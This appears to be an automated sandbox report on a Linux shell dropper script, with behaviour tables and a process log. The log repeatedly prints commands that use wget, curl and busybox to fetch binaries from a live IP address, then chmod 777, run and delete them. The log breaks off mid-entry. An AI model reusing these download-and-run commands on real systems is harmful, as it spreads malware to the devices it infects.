Analysis Overview
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
Threat Level: Shows suspicious behavior
The file a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:53
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 02:53
Reported
2024-11-14 02:56
Platform
debian9-mipsbe-20240729-en
Max time kernel
125s
Max time network
127s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
Processes
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/rm
[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/wget
[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/chmod
[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/rm
[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/wget
[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/chmod
[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/rm
[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/chmod
[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/rm
[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/wget
[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/chmod
[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/rm
[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/wget
[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/chmod
[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/rm
[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/wget
[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/chmod
[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/rm
[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/wget
[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/chmod
[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/rm
[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/wget
[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/chmod
[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/rm
[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/chmod
[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/rm
[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/chmod
[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/rm
[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/rm
[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/wget
[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/chmod
[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/rm
[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/wget
[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/chmod
[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/rm
[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/wget
[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/chmod
[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/rm
[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/wget
[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/curl
